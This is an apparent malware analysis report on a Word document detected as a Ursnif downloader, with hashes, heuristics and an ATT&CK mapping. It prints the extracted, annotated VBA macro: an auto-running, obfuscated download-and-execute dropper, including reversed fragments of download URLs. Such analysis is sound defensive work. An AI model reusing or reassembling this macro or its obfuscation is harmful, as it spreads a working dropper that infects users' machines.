Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bdff3032357737bb…

MALICIOUS

Office (OLE)

72.6 KB Created: 2018-09-11 13:03:00 Authoring application: Microsoft Office Word First seen: 2019-05-10
MD5: 59a542a2f0920d35429490a2baaf8c0d SHA-1: 73fe968d8ecd2f61b10005e8e2fd04b58a5086d0 SHA-256: bdff3032357737bb14b4503602c6cd36cc51da1dfde7af9e317adf92aef02496
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File. Note: the automated mapping covers only the macro and the user-execution lure. The extracted macro also assembles a caret-obfuscated `cmd /V/C` command line whose payload text, read backwards, is PowerShell (`DownloadFile(`, `Invoke-Item`), so T1059.003 (Windows Command Shell), T1059.001 (PowerShell), T1027 (Obfuscated Files or Information) and T1105 (Ingress Tool Transfer) are likely applicable as well — confirm by decoding the full command (the listing below is truncated).

The sample contains VBA macros in the ThisDocument module, including an auto-executing Document_Open handler that calls Shell() with a hidden window (Format(vbHide)). The command line is assembled at runtime from dozens of short string fragments: the characters 'c', 'C' and '"' are produced by Chr() arithmetic (Chr(99), Chr(67), Chr(34)), cmd.exe caret escapes (^) are sprinkled through every token, and the payload is stored in reverse order in an environment variable set via `cmd /V/C "set 6WP=..."`. Reading the reversed fragments yields a PowerShell download-and-execute loop (`$zww=$env:public+'\'+...+'.exe'; foreach(... in $lSp){try{...DownloadFile(..., $zww); Invoke-Item $zww; break}catch{}}`), i.e. a downloader for a second-stage executable dropped under %PUBLIC%. The ClamAV detection name 'Doc.Downloader.URSNIF-6729855-3' is consistent with this downloader behaviour; attribution to Ursnif specifically rests on the AV signature only.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard DrawingML XML namespace and is benign. The actual download endpoints are not listed here because the macro assembles them at runtime from reversed, caret-obfuscated fragments (an '@'-separated list later split with .Split('@')); they must be recovered by decoding the extracted macro (macros.bas) or from dynamic analysis, not from static URL extraction.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5705 bytes
SHA-256: 0caf1b00892c86c9d2e13cda7e6588fd62c47bb31ad5f6c8b6c16fc8e7e542d6
Preview script
First 1,000 lines of the extracted script
' Module attributes as exported by olevba. VB_Base = "1Normal.ThisDocument"
' indicates this is the document's ThisDocument class module, which is what
' allows the Document_open handler below to run automatically when the file
' is opened. The module name (VB_Name) is random-looking, consistent with
' generated/obfuscated code rather than a hand-written macro.
Attribute VB_Name = "vXNnnpAFE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-executing entry point: Word runs Document_Open when the document is
' opened (VBA identifiers are case-insensitive, so the lowercase "open" still
' matches the event handler name).
Private Sub Document_open()
' "On Error Resume Next" split across line continuations (_) so that any
' runtime error is silently ignored; splitting the keyword also defeats naive
' string-based signature matching.
On _
Error _
Resume _
Next
   VarType "HnZ" + "fG"    ' junk: VarType of a literal has no side effect (padding only)
   VarType "TYLH" + "413888414" + "VjwvOwISlTZ" + "RqaZ"    ' junk filler
' The only real action in this sub: concatenate three helper functions into a
' command line and execute it via Shell(). Format(vbHide) evaluates to "0"
' (vbHide), so the spawned window is hidden. rtmzwW and XkqkWfjl appear later
' in this listing; QIkLcX is beyond the truncation point and is not visible here.
Shell rtmzwW + XkqkWfjl + QIkLcX, Format(vbHide)
   VarType "QhpUPunqTmGh" + "ToB"    ' junk filler
   VarType "3477" + "2736"    ' junk filler
   VarType "z" + "Jfk"    ' junk filler
End Sub



' Second module (random name) holding the string-builder functions that the
' Document_open handler concatenates into the Shell() command line.
Attribute VB_Name = "foRhoOVIKaMAM"
' Returns the head of the command line passed to Shell(). The string is built
' from many short fragments so that no signature-matchable substring exists in
' the macro source. Three Chr() sums hide characters that would otherwise stand
' out in a scan:
'   Chr(1 + 7 + 3 + 9 + 79) = Chr(99) = "c"
'   Chr(1 + 4 + 2 + 6 + 54) = Chr(67) = "C"
'   Chr(0 + 2 + 1 + 2 + 29) = Chr(34) = double quote (")
' The carets (^) are cmd.exe escape characters that disappear when the shell
' parses the line. Removing them and reading the payload text backwards gives
' PowerShell:
'   $zww=$env:public+'\'+$wUz+'.exe';foreach($rPW in $lSp){try{
'   $CLz.DownloadFile($rPW, $zww);Invoke-Item $zww;break;}catch{}}
' i.e. a download-and-execute loop that tries each URL in $lSp, writes the
' result under %PUBLIC% and launches it. $lSp and $wUz are assigned in the
' fragments built by XkqkWfjl (which follow this string and therefore precede
' it once reversed); $CLz is presumably a WebClient created in fragments beyond
' the truncated part of this listing — TODO confirm from the full macro.
Function rtmzwW()

' Swallow all runtime errors (split "On Error Resume Next", see Document_open).
On _
Error _
Resume _
Next
VarType "T" + "Wik"    ' junk filler, no effect
   VarType "2246" + "I" + "NtiJ" + "BVwuqoHqQdrAT"    ' junk filler
   VarType "nzYUQsVzWzcVO" + "FOjoJF"    ' junk filler
' cmd /V/C"set 6WP=<spaces>}}  -- starts cmd.exe with delayed expansion (/V) and
' stores the reversed script in environment variable 6WP; the trailing "}}" are
' the closing braces of the PowerShell try/catch + foreach once reversed.
RbLsGFrLr = Format(Chr(1 + 7 + 3 + 9 + 79)) + "md /V" + "/" + Format(Chr(1 + 4 + 2 + 6 + 54)) + Format(Chr(0 + 2 + 1 + 2 + 29)) + "^s" + "^et " + "6^W^P=" + "^ ^   " + " " + "  ^ ^ " + "^  ^  " + "  ^  }}" + "^"
VarType "j" + "av"    ' junk filler
   VarType "BNud" + "8935" + "srkUQOaNV" + "245135162"    ' junk filler
   VarType "535719876" + "3251"    ' junk filler
' "{hctac};kaerb;wwz$ metI"  -> reversed: "Item $zww;break;}catch{"
ONEoDzUqV = "{^h" + Format(Chr(1 + 7 + 3 + 9 + 79)) + "ta" + Format(Chr(1 + 7 + 3 + 9 + 79)) + "};" + "k^a" + "^erb" + ";" + "w^wz$" + "^ " + "me^t^" + "I"
VarType "4211" + "390409561" + "VKOK" + "KiYw"    ' junk filler
' "-ekovnI;)wwz$ ,WPr$"  -> reversed: "$rPW, $zww);Invoke-"
XRVQAqcaKqc = "-" + "^ek^" + "ovnI^" + ";" + ")w^wz" + "$ " + ",^WPr$"
VarType "V" + "21829927" + "ZEf" + "HFAus"    ' junk filler
   VarType "vFZzOz" + "uCHlijY"    ' junk filler
' "(eliFdaolnwoD.zLC${"  -> reversed: "{$CLz.DownloadFile("
ToFCjHwIi = "(e^l^i" + "F^d^a" + "^o^ln" + "^woD" + "^." + "^zL" + Format(Chr(1 + 4 + 2 + 6 + 54)) + "^$" + "^{"
VarType "bJwG" + "4151"    ' junk filler
   VarType "391553800" + "HTujFNsbSUsP" + "1570" + "2923"    ' junk filler
' "yrt{)pSl$ ni WPr$(hcaerof;'ex"  -> reversed: "xe';foreach($rPW in $lSp){try"
TLJELA = "^yrt{)p" + "Sl^$ n^" + "i^ W^" + "Pr" + "$(h" + Format(Chr(1 + 7 + 3 + 9 + 79)) + "aer" + "o" + "f" + "^;^'^ex" + "^"
VarType "MYQSdTSij" + "fS"    ' junk filler
   VarType "4385" + "S"    ' junk filler
   VarType "4237" + "2124"    ' junk filler
   VarType "EjMTHnZzqz" + "290865336"    ' junk filler
' "e.'+zUw$+'\'+cilbup:vne$=wwz$"  -> reversed: "$zww=$env:public+'\'+$wUz+'.e"
pkaKBzq = "e^.'" + "+^z^Uw^" + "$+^" + "'^\^" + "'^+" + Format(Chr(1 + 7 + 3 + 9 + 79)) + "i" + "l^" + "b^u^" + "p^:vn^e" + "$=w" + "^wz^$"
' Concatenation order matters: the fragments are emitted in reverse script
' order, so the last fragment here (pkaKBzq) is the first PowerShell statement.
rtmzwW = RbLsGFrLr + ONEoDzUqV + XRVQAqcaKqc + ToFCjHwIi + TLJELA + pkaKBzq
   VarType "zQm" + "6769" + "f" + "bVP"    ' junk filler
   VarType "1846" + "HuiIjYjq"    ' junk filler
   VarType "E" + "PqE"    ' junk filler
   VarType "514198750" + "EhTt" + "471979682" + "168022499"    ' junk filler
End Function
Function XkqkWfjl()

On _
Error _
Resume _
Next
VarType "lvcijSUiwkXba" + "cXilHSPuRZS"
   VarType "vGw" + "kKO"
OmwXs = ";^'^6^5" + "^5^'" + " ^" + "=^ ^" + "zUw^$;" + ")'@'(" + "^" + "ti" + "^" + "l" + "pS."
VarType "oN" + "KbtjEmdD"
   VarType "4438" + "3057"
   VarType "7131" + "366189162" + "sN" + "279"
FfcZsLi = "^'^6" + Format(Chr(1 + 4 + 2 + 6 + 54)) + "t8" + "F^" + "W" + "^f^" + "M/^m" + "o" + Format(Chr(1 + 7 + 3 + 9 + 79)) + "." + "r^eg" + "ni"
VarType "wJFEjHmU" + "9888" + "268482876" + "5897"
   VarType "dCMSEZcA" + "nR"
   VarType "6657" + "pqd" + "9390" + "5608532"
iJGkHnCWwf = "^l^m" + "i" + "^" + "t//" + ":^"
VarType "rNJ" + "453894351" + "150733913" + "JQU"
   VarType "2720" + "Bhwk" + "Jdt" + "JwdoHFs"
   VarType "VEjjLao" + "4601"
PHIGCnDRij = "p^" + "t^t" + "h@S^g^" + "zP^" + "bkK^m" + "/rb^" + ".m" + "o" + Format(Chr(1 + 7 + 3 + 9 + 79)) + "^.s" + "arievi^" + "l^"
VarType "130354904" + "7558" + "kAfR" + "bPWEWoCRYfQilI"
   VarType "197850394" + "aMfN"
   VarType "alDADzXpDMAZP" + "2069"
IQsKBbGbGW = "o//" + ":p^t" + "th@Fx^" + "y" + "K^W" + "DL^" + "1" + "^3/ln.n" + "^worb^"
VarType "uFv" + "9890" + "249925569" + "KPbQtbrh"
   VarType "UbupJfollmhp" + "1738"
IVWZlommN = "e" + "v" + "^e^t^s/" + "/:" + "ptth" + "^@redUp" + "Q5^h/s" + "tat^s/" + "m" + "^o" + Format(Chr(1 + 7 + 3 + 9 + 79)) + ".e" + Format(Chr(1 + 7 + 3 + 9 + 79)) + "^i^ps" + "^d^ub" + "^e^l" + Format(Chr(1 + 7 + 3 + 9 + 79)) + "n"
VarType "vwROQShfVS" + "199177120"
   VarType "dBzOaKJN" + "397505804" + "343884759" + "455666179"
   VarType "oOBNDh" + "322966149"
bQbaz = "u/" + "/" + "^:p" + "t^t^" + "h@GH^ku" + "hk^M/^" + "mo" + Format(Chr(1 + 7 + 3 + 9 + 79)) + ".a" + "mixam"
VarType "C" + "stzMlN" + "GbuC" + "405355211"
   VarType "iiz" + "l" + "bjXkrvrPSJ"
... (truncated)